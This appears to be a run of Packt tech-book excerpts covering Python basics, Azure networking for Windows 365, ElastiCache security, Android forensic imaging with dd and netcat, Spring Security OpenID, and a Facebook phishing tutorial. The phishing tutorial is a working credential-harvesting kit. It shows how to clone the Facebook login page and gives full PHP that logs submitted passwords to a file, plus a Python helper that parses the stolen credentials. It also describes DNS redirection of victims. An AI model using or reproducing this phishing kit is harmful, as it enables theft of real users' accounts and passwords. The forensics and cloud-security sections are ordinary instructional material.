dictionary = {'item1': 10, 'item2': 20}
print(dictionary['item2'])

This will output 20. We cannot create multiple values with the same key; a duplicate key simply overwrites the previous value. Operations on dictionaries are unique; slicing, for example, is not supported.

We can combine two distinct dictionaries into one by using the update method, which also overwrites the values of any conflicting keys with those from the dictionary passed in:

a = {'apples': 1, 'mango': 2, 'orange': 3}
b = {'orange': 4, 'lemons': 2, 'grapes ': 4}
a.update(b)
print a

This will return:

{'mango': 2, 'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4}

To delete elements from a dictionary, we can use the del statement:

del a['mango']
print a

This will return:

{'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4}

Networking

Sockets are the basic blocks behind all of a computer's network communications: every network communication goes through a socket. So, sockets are the virtual endpoints of any communication channel between two applications, which may reside on the same or different computers. The socket module in Python gives us a convenient way to create network connections. To make use of this module, we have to import it in our script:

import socket
socket.setdefaulttimeout(3)
newSocket = socket.socket()
newSocket.connect(("localhost",22))
response = newSocket.recv(1024)
print response

This script will get the response header (the service banner) from the server.

Handling exceptions

Even if we write syntactically correct scripts, there will be some errors while executing them, so we have to handle errors properly.
The simplest way to handle exceptions in Python is with try-except. Try dividing a number by zero in your Python interpreter:

>>> 10/0
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ZeroDivisionError: integer division or modulo by zero

We can rewrite this with a try-except block:

try:
    answer = 10/0
except ZeroDivisionError, e:
    answer = e
print answer

This will print the error message integer division or modulo by zero instead of crashing the script.

Summary

Now we have an idea of the basic installation and configuration we have to do before coding. We have also gone through the basics of Python, which will help us speed up our scripting.

Resources for Article:

Further resources on this subject:

Exception Handling in MySQL for Python [article]
An Introduction to Python Lists and Dictionaries [article]
Python LDAP applications - extra LDAP operations and the LDAP URL library [article]

How to Create and Connect a Virtual Network in Azure for Windows 365

Christiaan Brinkhoff, Sandeep Patnaik, Morten Pedholt
31 Oct 2024
15 min read
This article is an excerpt from the book Mastering Windows 365, by Christiaan Brinkhoff, Sandeep Patnaik, and Morten Pedholt. Mastering Windows 365 provides you with detailed knowledge of Cloud PCs by exploring their design model and analyzing their security environment. This book will help you extend your existing skill set with Windows 365 effectively.

Introduction

In today's cloud-centric world, establishing a secure and efficient network infrastructure is crucial for businesses of all sizes. Microsoft Azure, with its robust set of networking tools, provides a seamless way to connect various environments, including Windows 365. In this guide, we will walk you through the process of creating a virtual network in Azure and connecting it to a Windows 365 environment. Whether you're setting up a new network or integrating an existing one, this step-by-step tutorial will give you the foundation necessary for a successful deployment.

Creating a virtual network in Azure

Start by going to https://portal.azure.com/ and create a new virtual network. It's quite straightforward: you can use all the default settings, but take care that the address space doesn't overlap with one you are already using.

1. Start by logging in to https://portal.azure.com.

2. Start the creation of a new virtual network. From here, choose the Resource group option and the name of the virtual network. When these have been defined, choose Next.

Figure 3.5 – Virtual network creation basic information

3. There are some security features you can enable on the virtual network. These features are optional, but Azure Firewall should be considered if no other firewall solution is deployed. When you are ready, click on Next.

Figure 3.6 – Virtual network creation security

4. Now the IP address range and subnets must be defined. Once these have been defined, click on Next.

Figure 3.7 – Virtual network creation | IP addresses

5.
Next, we can add any Azure tags that might be required for your organization. We will leave them as is in this case. Click on Next.

Figure 3.8 – Virtual network | Azure tags selection

6. We can now see an overview of the entire configuration of the new virtual network. When you have reviewed it, click on Create.

Figure 3.9 – Virtual network creation | settings review

Now that the virtual network has been created, we can start looking at how to create an ANC in Intune. We will look at the configuration for both an AADJ and a HAADJ network connection.

Setting up an AADJ ANC

Let's have a look at how to configure an ANC for an AADJ Cloud PC device:

1. Start by going to Microsoft Intune | Devices | Windows 365 | Azure network connection. From here, click on + Create and select Azure AD Join.

Figure 3.10 – Creating an ANC in Windows 365 overview

2. Fill out the required information, such as the display name of the connection, the virtual network, and the subnet you would like to integrate with Windows 365. Once that is done, click on Next.

Figure 3.11 – Creating an AADJ ANC | network details

3. Review the information you have filled in. When you are ready, click Review + create.

Figure 3.12 – Creating an AADJ ANC | settings review

Once the ANC has been created, you are done and should be able to view the connection in the ANC overview. You can now use that virtual network in your provisioning policy.

Figure 3.13 – Windows 365 ANC network overview

Setting up a HAADJ ANC

A HAADJ network connection is a bit trickier to set up than the previous one. We must ensure that the virtual network we are using has a connection to the domain we are trying to join. Once we are sure about that, let's go ahead and create a connection:

1.
Visit Microsoft Intune | Windows 365 | Azure network connection. From here, click on + Create and select Hybrid Azure AD Join.

Figure 3.14 – Creating a HAADJ ANC in Windows 365 | Overview

2. Provide the required information, such as the display name of the connection, the virtual network, and the subnet you would like to integrate with Windows 365. Click Next.

Figure 3.15 – Creating a HAADJ ANC | network details

3. Type the domain name you want the Cloud PCs to join. The Organization Unit field is optional. Type in the AD username and password for your domain-joined service account. Once done, click Next.

Figure 3.16 – Creating a HAADJ ANC | domain details

4. Review the settings provided and click on Review + create. The connection will now be established.

Figure 3.17 – Creating a HAADJ ANC | settings details

Once the creation is done, you can view the connection in the ANC overview. You will now be able to use that virtual network in your provisioning policy.

Figure 3.18 – Windows 365 ANC network overview

Conclusion

Creating a virtual network in Azure and connecting it to your Windows 365 environment is a fundamental step towards leveraging the full potential of cloud-based services. By following the outlined procedures, you can ensure a secure and efficient network connection, whether you're dealing with Azure AD Join (AADJ) or Hybrid Azure AD Join (HAADJ) scenarios. With the virtual network and ANC now configured, you are well equipped to manage and monitor your network connections, enhancing the overall performance and reliability of your cloud infrastructure.

Author Bio

Christiaan works as a Principal Program Manager and Community Lead on the Windows Cloud Experiences (Windows 365 + AVD) engineering team at Microsoft, bringing his expertise to help customers imagine new virtualization experiences. A former Global Black Belt for Azure Virtual Desktop, Christiaan joined Microsoft in 2018 as part of the FSLogix acquisition.
In his role at Microsoft, he worked on features such as the Windows 365 app, Switch, and Boot. His mission is to drive innovation while bringing Windows 365, Windows, and Microsoft Endpoint Manager (MEM) closer together, and to drive community efforts around virtualization that empower Microsoft customers to leverage new cloud virtualization scenarios.

Sandeep is a virtualization veteran with nearly two decades of experience in the industry. He has shipped multiple billion-dollar products and cloud services for Microsoft to a global user base, including Windows, Azure Virtual Desktop, and Windows 365. His contributions have earned him multiple patents in this field. Currently, he leads a stellar team that is responsible for building the product strategy for Windows 365 and Azure Virtual Desktop services and shaping the future of end-user experiences for these services.

Morten works as a Cloud Architect for a consultancy in Denmark, where he advises on and implements Microsoft virtual desktop solutions for customers around the world. Morten started his journey as a consultant over 8 years ago, managing client devices, but quickly found a passion for virtual device management. Today, Windows 365 and Azure Virtual Desktop are his main focus areas, alongside Microsoft Intune. Based on all the community activities Morten has done over the past years, he was awarded the Microsoft MVP award in the category of Windows 365 in March 2022.

How to secure ElastiCache in AWS

Savia Lobo
11 May 2018
5 min read
AWS offers services to handle the cache management process. Earlier, we would run Memcached or Redis installed on a VM, which made ensuring availability, patching, scalability, and security a complex and tough management task.

This article is an excerpt taken from the book 'Cloud Security Automation'. In this book, you'll learn the basics of why cloud security is important and how automation can be the most effective way of controlling cloud security.

On AWS, this service is available as ElastiCache. It gives you the option to use either engine (Redis or Memcached) to manage your cache. It's a scalable platform that is managed by AWS in the backend. ElastiCache provides a scalable and high-performance caching solution. It removes the complexity associated with creating and managing distributed cache clusters using Memcached or Redis. Now, let's look at how to secure ElastiCache.

Secure ElastiCache in AWS

For enhanced security, we deploy ElastiCache clusters inside a VPC. When they are deployed inside a VPC, we can use security groups and NACLs to add a level of security on the communication ports at the network level. Apart from this, there are multiple ways to enable security for ElastiCache.

VPC-level security

Using a security group at the VPC level: when we deploy AWS ElastiCache in a VPC, it gets associated with a subnet, a security group, and the routing policy of that VPC. Here, we define a rule to communicate with the ElastiCache cluster on a specific port. ElastiCache clusters can also be accessed from on-premise applications using VPN and Direct Connect.

Authentication and access control

We use IAM to implement authentication and access control on ElastiCache. For authentication, you can have the following identity types:

Root user: It's a superuser that is created while setting up an AWS account. It has super administrator privileges for all the AWS services.
However, it's not recommended to use the root user to access any of the services.

IAM user: It's a user identity in your AWS account that will have a specific set of permissions for accessing the ElastiCache service.

IAM role: We can also define an IAM role with a specific set of permissions and associate it with the services that want to access ElastiCache. It basically generates temporary access keys for using ElastiCache.

Apart from this, we can also specify federated access to services, where we have an IAM role with temporary credentials for accessing the service. To access ElastiCache, users or services must have a specific set of permissions, such as to create, modify, and reboot the cluster. For this, we define an IAM policy and associate it with users or roles. Let's see an example of an IAM policy where users will have permission to perform system administration activities on an ElastiCache cluster:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "ECAllowSpecific",
    "Effect": "Allow",
    "Action": [
      "elasticache:ModifyCacheCluster",
      "elasticache:RebootCacheCluster",
      "elasticache:DescribeCacheClusters",
      "elasticache:DescribeEvents",
      "elasticache:ModifyCacheParameterGroup",
      "elasticache:DescribeCacheParameterGroups",
      "elasticache:DescribeCacheParameters",
      "elasticache:ResetCacheParameterGroup",
      "elasticache:DescribeEngineDefaultParameters"],
    "Resource": "*"
  }]
}

Authenticating with Redis authentication

AWS ElastiCache also adds an additional layer of security with the Redis authentication command, which asks users to enter a password before they are granted permission to execute Redis commands on a password-protected Redis server.
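Before the token constraints are listed in detail below, note that they are simple enough to check in code. The following helper is purely illustrative (it is not part of boto3 or any AWS SDK); it validates a candidate AUTH token against the basic documented rules, assuming the 16-128 character range and the forbidden characters @, ", and /:

```python
def is_valid_auth_token(token):
    """Check a candidate ElastiCache Redis AUTH token against the basic
    documented constraints: 16 to 128 characters, with no @, ", or /."""
    if not 16 <= len(token) <= 128:
        return False
    if any(ch in token for ch in '@"/'):
        return False
    return True

print(is_valid_auth_token("short"))                       # False: fewer than 16 characters
print(is_valid_auth_token("a-much-longer-secret-token"))  # True
print(is_valid_auth_token('contains"a-forbidden-quote'))  # False: " is not allowed
```

A check like this is worth running before cluster creation, since the token cannot be changed afterwards.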
When we use Redis authentication, there are the following constraints for the authentication token while using ElastiCache:

Passwords must have at least 16 and at most 128 characters
The characters @, ", and / cannot be used in passwords
Authentication can only be enabled when creating clusters with the in-transit encryption option enabled
The password defined during cluster creation cannot be changed

To make passwords harder to guess, the following rules define the required strength of a password:

A password must include at least three of the following character types:
Uppercase characters
Lowercase characters
Digits
Non-alphanumeric characters (!, &, #, $, ^, <, >, -)
A password must not contain any commonly used word
A password must be unique; it should not be similar to previous passwords

Data encryption

AWS ElastiCache and EC2 instances have mechanisms to protect against unauthorized access to your data on the server. ElastiCache for Redis also has methods for encrypting data on Redis clusters. Here, too, you have data-in-transit and data-at-rest encryption methods.

Data-in-transit encryption

ElastiCache ensures the encryption of data while in transit from one location to another.
ElastiCache in-transit encryption implements the following features:

Encrypted connections: In this mode, SSL-based encryption is enabled for server and client communication
Encrypted replication: Any data moving between the primary node and the replication nodes is encrypted
Server authentication: Using data-in-transit encryption, the client checks the authenticity of a connection, that is, whether it is connected to the right server
Client authentication: Using data-in-transit encryption, the server can check the authenticity of the client using the Redis authentication feature

Data-at-rest encryption

ElastiCache for Redis at-rest encryption is an optional feature that increases data security by encrypting data stored on disk during sync and backup or snapshot operations. However, there are the following constraints for data-at-rest encryption:

It is supported only on replication groups running Redis version 3.2.6
It is not supported on clusters running Memcached
It is supported only for replication groups running inside a VPC
It is supported for replication groups running on any node type
It can only be defined during the creation of the replication group
Once enabled, it cannot be disabled

To summarize, we learned how to secure ElastiCache and ensure security for PaaS services, such as database and analytics services. If you've enjoyed reading this article, do check out 'Cloud Security Automation' for hands-on experience of automating your cloud security and governance.

How to start using AWS
AWS Sydney Summit 2018 is all about IoT
AWS Fargate makes Container infrastructure management a piece of cake

Phish for Facebook passwords with DNS manipulation [Tutorial]

Savia Lobo
09 Jul 2018
6 min read
Password phishing can result in a huge loss of identity and of users' confidential details. It can cause financial losses for users and can also lock them out of their own accounts. In this article, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to a phishing page, and grab the account password. This article is an excerpt taken from 'Python For Offensive PenTest', written by Hussam Khrais.

Facebook password phishing

Here, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to the phishing page, and grab the account password.

First, we need to set up a phishing page. You need not be an expert in web programming; you can easily Google the steps for preparing a phishing page. To create one, first open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as.... Make sure that you choose a complete page from the drop-down menu. The output should be an .html file.

Now let's extract some data here. Open the Phishing folder from the code files provided with this book. Rename the Facebook HTML page index.html. Inside this HTML, we have to change the login form. If you search for action=, you will see it. Here, we change the login form to redirect the request to a custom PHP page called login.php. Also, we have to change the request method to GET instead of POST.

You will see that I have added a login.php page in the same Phishing directory. If you open the file, you will find the following script:

<?php
header("Location: http://www.facebook.com/home.php?
");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

As soon as our target clicks on the Log In button, we will send the data as a GET request to this login.php, store the submitted data in our passwords.txt file, and then close it.

Next, we will create the passwords.txt file, where the target's credentials will be stored. Now, we copy all of these files into /var/www and start the Apache services. If we open the index.html page locally, we will see the phishing page that the target will see.

Let's quickly recap what happens when the target clicks on the Log In button. As soon as our target clicks on the Log In button, the target's credentials will be sent as a GET request to login.php. Remember that this happens because we have modified the action parameter to send the credentials to login.php. After that, login.php stores the data in the passwords.txt file.

Now, before we start the Apache services, let's make sure that we have an IP address. Enter the following command:

ifconfig eth0

You can see that we are running on 10.10.10.100. We will also start the Apache service using:

service apache2 start

Let's verify that we are listening on port 80, and that the service that is listening is Apache:

netstat -antp | grep "80"

Now, let's jump to the target side for a second. In our previous section, we used google.jo in our script. Here, we have already modified our previous script to redirect the Facebook traffic to our attacker machine. So, all our target has to do is double-click on the EXE file. Now, to verify:

Let us start Wireshark and then start the capture.
We will filter on the attacker IP, which is 10.10.10.100.

Open the browser and navigate to https://www.facebook.com/.

Once we do this, we're taken to the phishing page instead. Here, you will see the destination IP, which is the Kali IP address. So, on the target side, once we hit https://www.facebook.com/, we are actually viewing index.html, which is set up on the Kali machine. Once the victim clicks on the Log In button, the data will be sent as a GET request to login.php and stored in passwords.txt, which is currently empty.

Now, log into your Facebook account using your username and password, then jump to the Kali side and see if we get anything in the passwords.txt file. You can see it is still empty. This is because, by default, we have no permission to write data. To fix this, we will give all files full privileges, that is, to read, write, and execute:

chmod -R 777 /var/www/

Note that we did this because we are running in a VirtualBox environment. If you have a web server exposed to the public, it's bad practice to give full permission to all of your files, due to privilege escalation attacks: an attacker may upload a malicious file or manipulate the files, and then browse to the file location to execute a command of his own.

Now, after setting the permissions, we will stop and start the Apache server just in case:

service apache2 stop
service apache2 start

After doing this modification, go to the target machine and try to log into Facebook one more time. Then, go to Kali and open passwords.txt. You will see the submitted data from the target side, including the username and the password.

In the end, a good sign of phishing activity is a missing https indicator. We performed the password phishing process using Python.
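Because login.php writes each GET parameter as a key=value line, pulling the captured credentials out of passwords.txt is a one-function job in Python. The snippet below is a small illustrative helper, not part of the book's scripts; the field names email and pass are assumptions standing in for whatever parameter names appear in your capture:

```python
def parse_captured(text):
    """Parse the key=value lines written by the login.php logger into a dict."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if "=" not in line:
            continue  # blank separator line between submissions
        key, _, value = line.partition("=")
        creds[key] = value
    return creds

# Example capture with two logged GET parameters from one submission
sample = "email=victim@example.com\npass=S3cret!\n\n"
creds = parse_captured(sample)
print(creds["email"])  # victim@example.com
print(creds["pass"])   # S3cret!
```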
If you have enjoyed reading this excerpt, do check out 'Python For Offensive PenTest' to learn how to protect yourself and secure your accounts from these attacks, and to code your own scripts and master ethical hacking from scratch.

Phish for passwords using DNS poisoning [Tutorial]
How to secure a private cloud using IAM
How cybersecurity can help us secure cyberspace

Extracting data physically with dd

Packt
30 Apr 2015
10 min read
In this article by Rohit Tamma and Donnie Tindall, authors of the book Learning Android Forensics, we will cover physical data extraction using free and open source tools wherever possible. The majority of the material covered in this article will use ADB methods. (For more resources related to this topic, see here.)

The dd command should be familiar to any examiner who has done traditional hard drive forensics. dd is a Linux command-line utility used, by definition, to convert and copy files, but it is frequently used in forensics to create bit-by-bit images of entire drives. Many variations of dd also exist and are commonly used, such as dcfldd, dc3dd, ddrescue, and dd_rescue. As dd is built for Linux-based systems, it is frequently included on Android platforms. This means that a method for creating an image of the device often already exists on the device!

The dd command has many options that can be set, of which only the forensically important ones are listed here. The format of the dd command is as follows:

dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 conv=notrunc,noerror,sync

if: This option specifies the path of the input file to read from.
of: This option specifies the path of the output file to write to.
bs: This option specifies the block size. Data is read and written in the block size specified; it defaults to 512 bytes if not specified.
conv: This option specifies the conversion options as its attributes:
notrunc: This option does not truncate the output file.
noerror: This option continues imaging if an error is encountered.
sync: In conjunction with the noerror option, this option writes \x00 for blocks with an error. This is important for maintaining file offsets within the image.

Do not mix up the if and of flags; this could result in overwriting the target device! A full list of command options can be found at http://man7.org/linux/man-pages/man1/dd.1.html.
Note that there is an important correlation between the block size and the noerror and sync flags: if an error is encountered, x00 will be written for the entire block that was read (as determined by the block size). Thus, smaller block sizes result in less data being missed in the event of an error. The downside is that, typically, smaller block sizes result in a slower transfer rate. An examiner will have to decide whether a timely or a more accurate acquisition is preferred. Booting into recovery mode for the imaging process is the most forensically sound method.

Determining what to image

When imaging a computer, an examiner must first find what the drive is mounted as; /dev/sda, for example. The same is true when imaging an Android device. The first step is to launch the ADB shell and view the /proc/partitions file using the following command:

cat /proc/partitions

The output will show all partitions on the device. In the output shown in the preceding screenshot, mmcblk0 is the entirety of the flash memory on the device. To image the entire flash memory, we could use /dev/block/mmcblk0 as the input file flag (if) for the dd command. Everything following it, indicated by p1-p29, is a partition of the flash memory. The size is shown in blocks; in this case, the block size is 1024 bytes, for a total internal storage size of approximately 32 GB. To obtain a full image of the device's internal memory, we would run the dd command with mmcblk0 as the input file. However, we know that most of these partitions are unlikely to be forensically interesting; we're most likely only interested in a few of them. To view the corresponding names for each partition, we can look in the device's by-name directory. This does not exist on every device, and is sometimes in a different path, but for this device it is found at /dev/block/msm_sdcc.1/by-name.
By navigating to that directory and running the ls -al command, we can see where each block is symbolically linked, as shown in the following screenshot. If our investigation were only interested in the userdata partition, we now know that it is mmcblk0p28, and could use that as the input file to the dd command. If the by-name directory does not exist on the device, it may not be possible to identify every partition on the device. However, many of them can still be found by using the mount command within the ADB shell. Note that the following screenshot is from a different device that does not contain a by-name directory, so the data partition is not mmcblk0p28. On this device, the data partition is mmcblk0p34. If the mount command does not work, the same information can be found using the cat /proc/mounts command. Other options to identify partitions, depending on the device, are the cat /proc/mtd or cat /proc/yaffs commands; these may work on older devices. Newer devices may include an fstab file in the root directory (typically called fstab.<device>) that will list mountable partitions.

Writing to an SD card

The output file of the dd command can be written to the device's SD card. This should only be done if the suspect SD card can be removed and replaced with a forensically sterile SD card, to ensure that the dd command's output is not overwriting evidence. Obviously, if writing to an SD card, ensure that the SD card is larger than the partition being imaged. On newer devices, the /sdcard partition is actually a symbolic link to /data/media. In this case, using the dd command to copy the /data partition to the SD card won't work, and could corrupt the device, because the input file is essentially being written to itself. To determine where the SD card is symbolically linked to, simply open the ADB shell and run the ls -al command.
If the SD card partition is not shown, the SD card likely needs to be mounted in recovery mode using the steps shown in the article Extracting Data Logically from Android Devices. In the following example, /sdcard is symbolically linked to /data/media. This indicates that the dd command's output should not be written to the SD card. In the example that follows, /sdcard is not a symbolic link to /data, so the dd command's output can be used to write the /data partition image to the SD card. On older devices, the SD card may not even be symbolically linked. After determining which block to read and where the SD card is symbolically linked, image the /data partition to the /sdcard using the following command:

dd if=/dev/block/mmcblk0p28 of=/sdcard/data.img bs=512 conv=notrunc,noerror,sync

Now, an image of the /data partition exists on the SD card. It can be pulled to the examiner's machine with the ADB pull command, or simply read from the SD card.

Writing directly to an examiner's computer with netcat

If the image cannot be written to the SD card, an examiner can use netcat to write the image directly to their machine. The netcat tool is a Linux-based tool used for transferring data over a network connection. We recommend using a Linux or Mac computer for netcat, as it is built in, though Windows versions do exist. The examples below were done on a Mac.

Installing netcat on the device

Very few Android devices, if any, come with netcat installed. To check, simply open the ADB shell and type nc. If it returns saying nc is not found, netcat will have to be installed manually on the device. Netcat compiled for Android can be found in many places online. We have shared the version we used at http://sourceforge.net/projects/androidforensics-netcat/files/. If we look back at the results from our mount command in the previous section, we can see that the /dev partition is mounted as tmpfs.
The Linux term tmpfs means that the partition is meant to appear as an actual filesystem on the device, but is truly only stored in RAM. This means we can push netcat there without making any permanent changes to the device, using the following command on the examiner's computer:

adb push nc /dev/Examiner_Folder/nc

The command should have created the Examiner_Folder in /dev, and nc should be in it. This can be verified by running the following command in the ADB shell:

ls /dev/Examiner_Folder

Using netcat

Now that the netcat binary is on the device, we need to give it permission to execute from the ADB shell. This can be done as follows:

chmod +x /dev/Examiner_Folder/nc

We will need two terminal windows open, with the ADB shell open in one of them. The other will be used to listen to the data being sent from the device. Now we need to enable port forwarding over ADB from the examiner's computer:

adb forward tcp:9999 tcp:9999

9999 is the port we chose to use for netcat; it can be any arbitrary port number between 1023 and 65535 on a Linux or Mac system (1023 and below are reserved for system processes, and require root permission to use). Windows will allow any port to be assigned. In the terminal window with the ADB shell, run the following command:

dd if=/dev/block/mmcblk0p34 bs=512 conv=notrunc,noerror,sync | /dev/Examiner_Folder/nc -l -p 9999

mmcblk0p34 is the user data partition on this device; however, the entire flash memory or any other partition could also be imaged with this method. In most cases, it is best practice to image the entirety of the flash memory in order to acquire all possible data from the device. Some commercial forensic tools may also require the entire memory image, and may not properly handle an image of a single partition. In the other terminal window, run:

nc 127.0.0.1 9999 > data_partition.img

The data_partition.img file should now be created in the current directory of the examiner's computer.
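What `nc 127.0.0.1 9999 > data_partition.img` does on the examiner's side can be sketched in a few lines of Python: a listener that accepts a single connection and streams everything it receives to a file. This is an illustrative sketch, not from the original article; the port number and file name are arbitrary.

```python
import socket

def receive_image(port, out_path):
    """Accept one TCP connection on localhost and write the received
    stream to disk, mirroring `nc -l -p <port> > <file>`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    conn, _ = srv.accept()
    with open(out_path, "wb") as f:
        while True:
            chunk = conn.recv(65536)
            if not chunk:        # sender closed the connection: transfer done
                break
            f.write(chunk)
    conn.close()
    srv.close()

# e.g. receive_image(9999, "data_partition.img") while dd | nc runs on the device
```

In practice you would also hash the resulting image (for example with hashlib.sha256, reading it in chunks) and compare the digest against one computed on the device, to confirm the transfer was not corrupted.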
When the data is finished transferring, netcat in both terminals will terminate and return to the command prompt. The process can take a significant amount of time, depending on the size of the image.

Summary

This article discussed techniques used for physically imaging internal memory or SD cards. Some of the common properties and problems associated with dd are as follows:

- Usually pre-installed on the device
- May not work on MTD blocks
- Does not obtain the Out-of-Band area

Additionally, each imaging technique can be used either to save the image on the device (typically on the SD card) or, with netcat, to write the file to the examiner's computer.

Writing to the SD card:
- Easy; doesn't require additional binaries to be pushed to the device
- Familiar to most examiners
- Cannot be used if the SD card is symbolically linked to the partition being imaged
- Cannot be used if the entire memory is being imaged

Using netcat:
- Usually requires yet another binary to be pushed to the device
- Somewhat complicated; the steps must be followed exactly
- Works no matter what is being imaged
- May be more time-consuming than writing to the SD card

Further resources on this subject:
- Reversing Android Applications [article]
- Introduction to Mobile Forensics [article]
- Processing the Case [article]

Opening up to OpenID with Spring Security

Packt
27 May 2010
7 min read
The promising world of OpenID

The promise of OpenID as a technology is to allow users on the web to centralize their personal data and information with a trusted provider, and then use the trusted provider as a delegate to establish trustworthiness with other sites with which the user wants to interact. In concept, this type of login through a trusted third party has been in existence for a long time, in many different forms (Microsoft Passport, for example, became one of the more notable central login services on the web for some time). OpenID's distinct advantage is that the OpenID provider needs to implement only the public OpenID protocol to be compatible with any site seeking to integrate login with OpenID. The OpenID specification itself is an open specification, which means there is currently a diverse population of public providers running the same protocol. This is an excellent recipe for healthy competition, and it is good for consumer choice.

The following diagram illustrates the high-level relationship between a site integrating OpenID during the login process and OpenID providers. We can see that the user presents his credentials in the form of a unique named identifier, typically a Uniform Resource Identifier (URI), which is assigned to the user by their OpenID provider and is used to uniquely identify both the user and the OpenID provider. This is commonly done either by prepending a subdomain to the URI of the OpenID provider (for example, https://jamesgosling.myopenid.com/), or by appending a unique identifier to the URI of the OpenID provider (for example, https://me.yahoo.com/jamesgosling). We can see from the presented URI that both methods clearly identify both the OpenID provider (via the domain name) and the unique user identifier.

Don't trust OpenID unequivocally!

You can see here a fundamental assumption that can fool users of the system.
It is possible for us to sign up for an OpenID which would make it appear as though we were James Gosling, even though we obviously are not. Do not make the false assumption that, just because a user has a convincing-sounding OpenID (or OpenID delegate provider), they are the authentic person, without requiring additional forms of identification. Thinking about it another way: if someone came to your door just claiming he was James Gosling, would you let him in without verifying his ID?

The OpenID-enabled application then redirects the user to the OpenID provider, where the user presents his credentials to the provider, which is then responsible for making an access decision. Once the access decision has been made by the provider, the provider redirects the user to the originating site, which is now assured of the user's authenticity. OpenID is much easier to understand once you have tried it. Let's add OpenID to the JBCP Pets login screen now!

Signing up for an OpenID

In order to get the full value of the exercises in this section (and to be able to test login), you'll need your own OpenID from one of the many available providers, of which a partial listing is available at http://openid.net/get-an-openid/. Common OpenID providers with which you probably already have an account are Yahoo!, AOL, Flickr, or MySpace. Google's OpenID support is slightly different, as we'll see later in this article when we add Sign In with Google support to our login page. To get full value out of the exercises in this article, we recommend you have accounts with at least:

- myOpenID
- Google

Enabling OpenID authentication with Spring Security

Spring Security provides convenient wrappers around provider integrations that are actually developed outside the Spring ecosystem. In this vein, the openid4java project (http://code.google.com/p/openid4java/) provides the underlying OpenID provider discovery and request/response negotiation for the Spring Security OpenID functionality.
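Before wiring up the login form, it helps to see how an OpenID identifier encodes both the provider and the user. The two conventions described above, provider subdomain and provider path, can be picked apart with standard URI parsing. This is an illustrative Python sketch (not part of the original article), using the example identifiers from the text:

```python
from urllib.parse import urlparse

def describe_openid(identifier):
    """Split an OpenID identifier URI into (provider, user) for the two
    common layouts: subdomain style and path style."""
    u = urlparse(identifier)
    host = u.netloc
    if u.path.strip("/"):
        # Path style, e.g. https://me.yahoo.com/jamesgosling
        return host, u.path.strip("/")
    # Subdomain style, e.g. https://jamesgosling.myopenid.com/
    return ".".join(host.split(".")[1:]), host.split(".")[0]

print(describe_openid("https://jamesgosling.myopenid.com/"))  # ('myopenid.com', 'jamesgosling')
print(describe_openid("https://me.yahoo.com/jamesgosling"))   # ('me.yahoo.com', 'jamesgosling')
```

Note that this parsing is exactly why the identifier alone proves nothing: anyone can register a convincing-looking provider or username, which is the trap warned about above.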
Writing an OpenID login form

It's typically the case that a site will present both standard (username and password) and OpenID login options on a single login page, allowing the user to select from one or the other option, as we can see in the JBCP Pets target login page. The code for the OpenID-based form is as follows:

<h1>Or, Log Into Your Account with OpenID</h1>
<p>
  Please use the form below to log into your account with OpenID.
</p>
<form action="j_spring_openid_security_check" method="post">
  <label for="openid_identifier">Login</label>:
  <input id="openid_identifier" name="openid_identifier" size="20" maxlength="100" type="text"/>
  <img src="images/openid.png" alt="OpenID"/>
  <br />
  <input type="submit" value="Login"/>
</form>

The name of the form field, openid_identifier, is not a coincidence. The OpenID specification recommends that implementing websites use this name for their OpenID login field, so that user agents (browsers) have semantic knowledge of the function of this field. There are even browser plug-ins, such as VeriSign's OpenID SeatBelt (https://pip.verisignlabs.com/seatbelt.do), which take advantage of this knowledge to pre-populate your OpenID credentials into any recognizable OpenID field on a page.

You'll note that we don't offer the remember me option with OpenID login. This is due to the fact that the redirection to and from the vendor causes the remember me checkbox value to be lost, so that when the user is successfully authenticated, they no longer have the remember me option indicated. This is unfortunate, but it ultimately increases the security of OpenID as a login mechanism for our site, as OpenID forces the user to establish a trust relationship through the provider with each and every login.
Configuring OpenID support in Spring Security

Turning on basic OpenID support, via the inclusion of a servlet filter and authentication provider, is as simple as adding a directive to our <http> configuration element in dogstore-security.xml as follows:

<http auto-config="true" ...>
  <!-- Omitting content... -->
  <openid-login/>
</http>

After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won't have any roles assigned to them. We'll take care of this next.

Adding OpenID users

As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account that we'll be testing into the database, by adding it to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment). If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL that we'd insert in this file is as follows:

insert into users(username, password, enabled, salt)
  values ('https://jamesgosling.myopenid.com/', 'unused', true, CAST(RAND()*1000000000 AS varchar));
insert into group_members(group_id, username)
  select id, 'https://jamesgosling.myopenid.com/'
  from groups where group_name='Administrators';

You'll note that this is similar to the other data that we inserted for our traditional username-and-password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require our site to store a password on behalf of the user!
The observant reader will note, however, that this does not allow a user to create an arbitrary username and password and associate it with an OpenID; we describe this process briefly later in this article, and you are welcome to explore how to do this as an advanced application of this technology. At this point, you should be able to complete a full login using OpenID. The sequence of redirects is illustrated with arrows in the following screenshot. We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience that the provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.

Mobile Forensics and Its Challenges

Packt
25 Apr 2016
10 min read
In this article by Heather Mahalik and Rohit Tamma, authors of the book Practical Mobile Forensics, Second Edition, we will cover the following topics:

- Introduction to mobile forensics
- Challenges in mobile forensics

